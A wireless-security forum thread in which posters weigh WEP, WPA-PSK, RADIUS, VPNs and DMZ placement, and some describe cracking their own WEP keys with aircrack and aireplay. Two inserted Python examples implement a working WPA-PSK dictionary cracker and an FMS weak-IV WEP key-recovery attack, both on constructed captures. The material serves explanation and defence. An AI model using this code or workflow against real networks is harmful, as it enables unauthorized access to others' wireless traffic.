jubbly
Well I am slowly putting in more and more wireless networks and am trying to work out the most secure way to implement them.

From just driving around my local town I am surprised to find the amount of un-encrypted networks that are easily joined. I have been looking into WEP cracking and have now seen that it's easily done (http://www.securityfocus.com/infocus/1814).

I am now looking at WPA-PSK which seems to be better but I have found that you can use dictionary attacks against this wireless encryption.

I currently use 128-bit WEP and MAC address filtering but would like to know what else you can implement. Would WPA-PSK be stronger than WEP, although older 802.11b clients don't appear to have any WPA capabilities?

So what can you do?

What setup should be used for you to have a secure wireless network?
beardednose
I'd use WPA and MAC filtering unless you can afford to go to EAP-FAST or PEAP, which can be costly and admin intensive. Place your APs outside your firewall so you can block what you can and do extensive logging.

Or VPN in, but even IPSEC VPNs can be hacked.

While there is no secure wireless, put up a good fence so that the attacker will go to the next network and leave yours alone.

Other suggestions, folks?
dieter
Well, here's the list I'd use for protecting wifi access

* don't broadcast the SSID (although it still can be discovered when clients are connected to the AP)
* use MAC filters on your AP
* use WPA
* Use an IPSEC VPN (preferably with strong authentication) on top of the wifi access

Dieter
digitalk2003
I've seen people implement different wireless (in)security measures, from PEAP to TLS/EAP and WEP/MAC-Filtering. Most require a fair amount of setup, as beardednose mentioned.

IMO, a fair solution to wireless security, at the moment, may lie in implementing a radius server. Radius servers support a variety of security measures, this one just happens to have screenshots of the PEAP implementation.

Unix reference: http://tldp.org/HOWTO/8021X-HOWTO/freeradius.html

Here is a guide to setting WinXP clients to authenticate with your radius server.

Link: http://text.dslreports.com/forum/remark,9286052~mode=flat

Another related link gives you a "play-by-play" in setting up the radius server for allowing EAP/TLS for WinXP clients. Lots of screenshots.

Link: http://www.freeradius.org/doc/EAPTLS.pdf

Ciao..

digitalk2003
SgtRush
Has anyone tested the tools listed in this document? I am fairly well versed with Kismet but I hadn't heard of these newer tools. Of course I probably haven't been paying that much attention with the job change. I am going to use an older laptop and test some of this information out. Might be fun, I will post my results if I have any.
sk3tch
I would also recommend looking at wireless as a "least privilege" network. Since we all know that if someone really wants to get in..they'll get in...just plan to be hacked and minimize damage by:

1) Setting up the wireless network as a DMZ...completely separate from desktops, servers, etc. - ISOLATION is key. If they get in..leave them nothing fun to do!
2) Restricting outgoing traffic...perhaps ALL traffic (which leads into the next point)
3) Use an HTTP proxy that requires authentication (for bonus points, have AV protection on the proxy so all content is scanned before being delivered to the browser).

Obviously, use all the suggestions mentioned by others to secure your wireless, but beyond that, use the suggestions above as guidance for minimizing your losses should an unauthorized and malicious user get in.

On my wireless networks, I assume they are 100% compromised (or compromisable) at all times and secure the networks as such.
beardednose
which doc?
Spookie
Here's some reading material for you. Wireless Security Vendor Reports,

Exploiting and Protecting 802.11b Wireless Networks,

GIAC Practical Write-Up,

and also WarDrive Security Links which has a slew of Wireless Security PDF's.

You may want to consider using Share Watch to see who's on what, as well as AirSnare which is a Wireless IDS.

When 802.11i is sold you'll have a better function for security than you would with the standard wireless available. You can read more about that at NWFusion

If you've been bitten by the wireless bug and want to know what's happening in the wireless world a source of information for you would be Fierce Wireless

Hope this gives you some help regarding what you're trying to do. If you have some money burning a hole in your pocket you can look at Wired and Wireless Security For Small Offices
forza
Here we use this:

- WPA 128bit
- put your wireless access points into a DMZ, and have your wireless users tunnel into your network using a VPN
- turn off DHCP
- don't forget to change the default password on your access point or wireless router.
- not only disable SSID broadcast, also rename SSID
- change channel
- disallow administration via wireless
- MAC address filtering

And now we are setting up a radius-server.

btw 802.1X Implementations
http://www.open1x.org/
http://wire.cs.nthu.edu.tw/wire1x/
SgtRush
@ BN From the initial post. (http://www.securityfocus.com/infocus/1814).

Quick update, it took forever to get a 802.11g card to work with kismet. I finally loaded a linux distro with a 2.6 kernel which has support for the prism54 cards built in. Collected 50k worth of encrypted packets and started aircrack against it. 14 hours later still no crack. I realize the number of packets collected is far less than some collected in the examples page. Also hindering my efforts was the fact that no weak IV packets were captured. I will recollect data at work next week. I am sure the sales dept, has a bunch of older nics that will give me better data to work with.
fenriz_
In addition to the items listed, consider...
Any WEP key can be cracked. Making your key more "random" may slightly help but this is really only true against a dictionary attack.

*EAP can be a pain to admin and has its own security problems.

WPA is vulnerable to a DoS against the entire AP (on most implementations).

RADIUS isn't really going to provide any protection for the data and has to be configured carefully to avoid common mistakes.

IPSec VPNs, SSL VPNs, etc... are good but take time, hardware, and have to be maintained to be effective. Also some are vulnerable to certain MITM attacks.

MAC filtering will stop people from stumbling on to your network but is trivial to defeat.

Disabling SSID broadcast is a best practice but it does not really hide you from anything.

Disallow admin access from wireless network -- one of the best ideas I've heard all day!

DMZ the AP -- another good idea

Can also consider tunneling everything through SSH/SSL tunnels from the end user through the AP to another gateway.

While many of these defenses are marginal, they all should be looked at and considered. There is no real bulletproof way to defend your wireless network besides turning it off. Layer as many of these as possible and you are protecting yourself as much as you can.

Also consider what the importance of the data is and how likely you are of being attacked by someone who knows how to defeat these measures and has the time to be in range of your network and do it.
SgtRush
Alright, I have 100,000 encrypted packets and have been running aircrack for a week with a fudge factor of 4.

Obviously having weak IVs would help. I have to come to the conclusion that cracking WEP isn't as easy as the aforementioned article claims it to be.
I will still play with this but unless anyone here has had success cracking 128-bit keys in a short time period, I am going to come to the conclusion that this information is bogus or there are other mitigating factors at best.
jubbly
QUOTE(SgtRush @ Jan 25 2005, 08:58 PM)
Alright, I have 100,000 encrypted packets and have been running aircrack for a week with a fudge factor of 4.

Obviously having weak IVs would help. I have to come to the conclusion that cracking WEP isn't as easy as the aforementioned article claims it to be.
I will still play with this but unless anyone here has had success cracking 128-bit keys in a short time period, I am going to come to the conclusion that this information is bogus or there are other mitigating factors at best.

I have also been testing this and not had a great deal of luck with cracking these. I have even used a spare server (not installed it yet cos I wanted a good spec to test things with) and left it cracking a fairly easy ASCII WEP key (6 chars, 1-4 alpha, 5-6 numeric) and I haven't had the result turn out yet and I have been running it for 6 days now. Maybe I'll have a result on Monday morning but if not I'm gonna have to terminate it and actually install this server.

So has anyone else had any more positive results on cracking WEP?

I'm gonna look more into the RADIUS server now though.
withdraw
Here is a quick paper on wireless security. It has a good section about how WPA works.

Wireless Networking for the Paranoid Hacker

Edit:

Here's another paper on IPsec from the same website.

The longest short IP Sec Paper
Fletcher
QUOTE(sk3tch @ Jan 6 2005, 09:33 PM)
I would also recommend looking at wireless as a "least privilege" network. Since we all know that if someone really wants to get in..they'll get in...just plan to be hacked and minimize damage by:

1) Setting up the wireless network as a DMZ...completely separate from desktops, servers, etc. - ISOLATION is key. If they get in..leave them nothing fun to do!
2) Restricting outgoing traffic...perhaps ALL traffic (which leads into the next point)
3) Use an HTTP proxy that requires authentication (for bonus points, have AV protection on the proxy so all content is scanned before being delivered to the browser).

Obviously, use all the suggestions mentioned by others to secure your wireless, but beyond that, use the suggestions above as guidance for minimizing your losses should an unauthorized and malicious user get in.

On my wireless networks, I assume they are 100% compromised (or compromisable) at all times and secure the networks as such.

You are totally right: wifi = open world (for your neighbour)

If you use WPA, to improve your security the password must be a minimum of 20 characters.
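jubbly's worry about dictionary attacks on WPA-PSK and Fletcher's 20-character minimum have the same root: the pairwise master key is derived from nothing but the passphrase and the SSID, so one captured 4-way handshake lets an attacker test passphrases offline for as long as he likes. The following is an added Python example, not code from the thread or from any tool named in it. The handshake, MAC addresses, nonces, EAPOL bytes and wordlist are all constructed here; the derivations themselves (PBKDF2-HMAC-SHA1 with 4096 iterations, the 802.11i PRF for the PTK, and the HMAC-SHA1 MIC of the WPA2 key descriptor) are the standard ones.

```python
"""WPA/WPA2-PSK key derivation and the offline dictionary attack it permits.
Added example; the handshake and wordlist below are constructed, not captured."""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Optional


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits), per IEEE 802.11i.
    Only the passphrase and the public SSID go in, so the attacker can recompute it offline."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..4, truncated."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(5)]
    return b"".join(blocks)[:64]


def wpa_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the handshake inputs; its first 16 bytes (the KCK) key the EAPOL MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/AES): HMAC-SHA1 over the frame with the MIC field
    zeroed, truncated to 16 bytes. Version 1 (TKIP) uses HMAC-MD5 instead."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


@dataclass
class Handshake:
    """What an attacker keeps from a sniffed 4-way handshake; all of it is sent in the clear."""
    ssid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes
    snonce: bytes
    eapol_msg2: bytes  # EAPOL-Key message 2 with its 16-byte MIC field zeroed
    mic: bytes         # the MIC the client actually transmitted


def simulate_handshake(passphrase: str, ssid: str, seed: bytes = b"constructed") -> Handshake:
    """Constructed stand-in for a captured handshake (MACs, nonces and frame bytes are made up;
    a real cracker parses them from the EAPOL frames in the pcap)."""
    ap_mac = bytes.fromhex("00c0ca000001")
    sta_mac = bytes.fromhex("000c29000002")
    anonce = hashlib.sha256(seed + b"anonce").digest()
    snonce = hashlib.sha256(seed + b"snonce").digest()
    # EAPOL-Key message 2, abbreviated: EAPOL header, descriptor type, key info, key length,
    # replay counter, SNonce, IV/RSC/ID fields, zeroed MIC, zero key-data length.
    eapol_msg2 = (b"\x01\x03\x00\x5f" + b"\x02\x01\x0a\x00\x10" + b"\x00" * 8 + snonce
                  + b"\x00" * 32 + b"\x00" * 16 + b"\x00\x00")
    kck = wpa_ptk(wpa_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2,
                     eapol_mic(kck, eapol_msg2))


# Constructed wordlist; a real attack runs millions of entries through the same loop.
WORDLIST = ["letmein", "password", "wireless", "summer2005", "changeme"]


def crack_psk(hs: Handshake, wordlist) -> Optional[str]:
    """Offline dictionary attack: recompute PMK -> PTK -> MIC per candidate and compare."""
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:   # WPA passphrases are 8..63 ASCII characters
            continue
        pmk = wpa_pmk(candidate, hs.ssid)
        kck = wpa_ptk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, hs.eapol_msg2), hs.mic):
            return candidate
    return None


if __name__ == "__main__":
    weak = simulate_handshake("summer2005", "corpnet")
    print("weak passphrase recovered:", crack_psk(weak, WORDLIST))
    strong = simulate_handshake("correct horse battery staple 2005", "corpnet")
    print("strong passphrase recovered:", crack_psk(strong, WORDLIST))
```

Every candidate costs the attacker 4096 HMAC-SHA1 calls and nothing else, so the only defence that holds up is entropy: a long random passphrase is simply not in any wordlist. The SSID is the PBKDF2 salt, which is why forza's "rename SSID" item matters beyond obscurity: a vendor-default SSID lets an attacker reuse precomputed PMK tables instead of running PBKDF2 per guess.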
virus
Anyone heard of Faraday's cage? I was told that banks deploy such solutions if they ever need wireless on the inside..
exobot
QUOTE(virus @ Apr 22 2005, 02:21 PM)
anyone heard of Faraday's cage?

Actually... hxxp://www.forcefieldwireless.com/defendair.html

(it's based on the Faraday cage principle)
jim-bob
QUOTE(SgtRush @ Jan 25 2005, 10:58 PM)
Alright, I have 100,000 encrypted packets and have been running aircrack for a week with a fudge factor of 4.

Obviously having weak IVs would help. I have to come to the conclusion that cracking WEP isn't as easy as the aforementioned article claims it to be.
I will still play with this but unless anyone here has had success cracking 128-bit keys in a short time period, I am going to come to the conclusion that this information is bogus or there are other mitigating factors at best.

Managed to crack my 128-bit WEP key in 12 minutes; this includes packet gathering as well as actual cracking.

SgtRush
Looks like I will have to revisit this when I have time. Mind if I run my test scenario by you when I find that aforementioned time? Thanks in advance.
jim-bob
QUOTE(SgtRush @ Jun 17 2005, 10:13 AM)
Looks like I will have to revisit this when I have time. Mind if I run my test scenario by you when I find that aforementioned time? Thanks in advance.

Sure, just let me know when you are ready.

What I can do in the meantime is perhaps point you in the right direction.

The tools I used were all part of the Auditor Linux collection downloadable from:

hxxp://new.remote-security.com

There is also a tutorial on this site that shows you step by step how it can be done.
Just check the "Tutorials" page.
SgtRush
Those were the tools I used. Did you get any weak IV packets?
jim-bob
QUOTE(SgtRush @ Jun 17 2005, 02:40 PM)
Those were the tools I used. Did you get any weak IV packets?

Got a few, then used aireplay to generate a lot, really quickly.

Which WLAN card are you using?
SgtRush
That's the difference then. I got absolutely none. I was using Netgear's 54g card, the version before they went with a non-Prism chipset. It's Father's Day and I intend to spend it with my wife and daughter so I won't get to it today. Most of next week I am onsite writing policies and procedures. I will bring my wireless sniffer onsite with me and play with it during writing breaks. I will let you know how it goes. Thanks for the response.
SgtRush
Success! I was able to crack a 128 bit wep key last night.

I downloaded the latest Auditor CD and loaded it onto the laptop's hard drive. It's got aireplay 2.2; apparently 2.1 requires multiple wireless NICs (I was getting segmentation faults and couldn't figure out why). It took a little longer than 12 minutes, more like 45 minutes to gather 400k IV packets, but once that was achieved it cracked the key in 15 seconds.

So what did I learn?
1. Don't run aircrack against your Kismet dump file.
2. Don't even attempt aircrack until you have enough packets.
3. Do use aireplay or some other utility to drive up the number of unique IVs.

@ BN You asked a question some time ago about loading Auditor on the hard drive. It was a piece of cake. I had some issues with the earlier version not booting into the GUI correctly. I simply told it to start manually after I had logged in. The latest version didn't have that issue and the latest version of some tools didn't hurt either.

Now I need to be able to consistently accomplish this and then incorporate it into my security presentations. I imagine this will keep some of our customers from going to Best Buy and actually seeing the need to buy a business class product.

Thanks to all for your input and making me revisit this again. I feel like a kid at Christmas, and as old as I am that's saying something.
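The WEP experiments in this thread, from fenriz_'s "any WEP key can be cracked" to SgtRush's three lessons (enough packets, weak IVs, inject to drive up unique IVs, plus the fudge factor he ran aircrack with) all come down to one statistical attack: Fluhrer, Mantin and Shamir's 2001 weak-IV attack on RC4's key schedule, which aircrack extends with KoreK's additional IV classes. The following is an added Python simulation, not code from the thread or from aircrack. It encrypts constructed frames under a constructed 40-bit key, keeps only what a sniffer sees (the cleartext 3-byte IV and the ciphertext), votes on each secret key byte using the (A+3, 255, X) weak-IV class, branches over the top-ranked candidates the way aircrack's fudge factor does, and confirms a full key by checking the CRC-32 ICV of two frames. Everything about the capture is constructed; a 104-bit key needs 13 rounds of the same voting and correspondingly more weak IVs.

```python
"""WEP key recovery from weak IVs (the FMS attack), as a self-contained simulation.
Added example with a constructed capture and key; not code from the thread or from aircrack."""
import struct
import zlib
from collections import Counter

SNAP_DSAP = 0xAA   # first plaintext byte of every WEP data frame (LLC/SNAP header)


def rc4_ksa(key: bytes) -> list:
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_keystream(key: bytes, n: int) -> bytes:
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret: bytes, iv: tuple, payload: bytes):
    """WEP body = LLC/SNAP || payload || CRC-32 ICV, RC4-encrypted under IV || secret.
    The IV is transmitted in the clear, which is exactly what the attack exploits."""
    body = b"\xaa\xaa\x03" + payload
    plain = body + struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)
    ks = rc4_keystream(bytes(iv) + secret, len(plain))
    return iv, bytes(p ^ k for p, k in zip(plain, ks))


def wep_icv_ok(secret: bytes, iv: tuple, ct: bytes) -> bool:
    """Decrypt under a candidate key and check the ICV: this is how a key guess is confirmed."""
    ks = rc4_keystream(bytes(iv) + secret, len(ct))
    plain = bytes(c ^ k for c, k in zip(ct, ks))
    return struct.unpack("<I", plain[-4:])[0] == (zlib.crc32(plain[:-4]) & 0xFFFFFFFF)


def fms_vote(iv: tuple, known: list, ks0: int):
    """One weak IV (A+3, 255, X) votes for secret byte A = len(known).
    Replay the first A+3 KSA steps with the bytes already known; if the state is
    'resolved', the first keystream byte equals S[j] of step A+3 with probability
    about 5%, and that pins down the key byte used in that step. Otherwise no vote."""
    a = len(known)
    key = list(iv) + known
    s = list(range(256))
    j = 0
    for i in range(a + 3):
        j = (j + s[i] + key[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
    if s[1] >= a + 3 or (s[1] + s[s[1]]) & 0xFF != a + 3:
        return None
    return (s.index(ks0) - j - s[a + 3]) & 0xFF


def crack_wep(packets, key_len: int, fudge: int = 8):
    """Vote per key byte over the weak IVs, branch over the top `fudge` candidates
    (aircrack's fudge factor), and verify each full candidate key against two frames' ICVs."""
    weak = {}
    for iv, ct in packets:
        if iv[1] == 0xFF and 3 <= iv[0] < key_len + 3:
            weak.setdefault(iv[0] - 3, []).append((iv, ct[0] ^ SNAP_DSAP))
    check = packets[:2]   # two ICVs: a wrong key passing both is a 2^-64 event

    def search(known):
        if len(known) == key_len:
            key = bytes(known)
            return key if all(wep_icv_ok(key, iv, ct) for iv, ct in check) else None
        votes = Counter()
        for iv, ks0 in weak.get(len(known), []):
            guess = fms_vote(iv, known, ks0)
            if guess is not None:
                votes[guess] += 1
        for cand, _ in votes.most_common(fudge):
            found = search(known + [cand])
            if found is not None:
                return found
        return None

    return search([])


def simulate_capture(secret: bytes, payload: bytes = b"constructed frame body"):
    """Attacker's view of a sniffed session: (iv, ciphertext) pairs. Only FMS-class IVs are
    generated here; on a real link they are a small fraction of frames, which is why driving
    up the IV count with aireplay-style injection makes the difference."""
    return [wep_encrypt(secret, (a + 3, 0xFF, x), payload)
            for a in range(len(secret)) for x in range(256)]


if __name__ == "__main__":
    secret = bytes.fromhex("1f3c5a779e")          # constructed 40-bit WEP key
    recovered = crack_wep(simulate_capture(secret), len(secret))
    print("recovered key:", recovered.hex() if recovered else None)
```

The failure mode SgtRush hit is visible in the vote loop: in this FMS-only implementation a frame whose IV is not in a weak class contributes nothing, so 100,000 ordinary packets can be worth less than a few hundred injected ones, and "collecting more" only helps if the collection fills the weak-IV classes. Once they are filled, the voting and the ICV confirmation take seconds, which matches the 15-second crack after 45 minutes of gathering reported above.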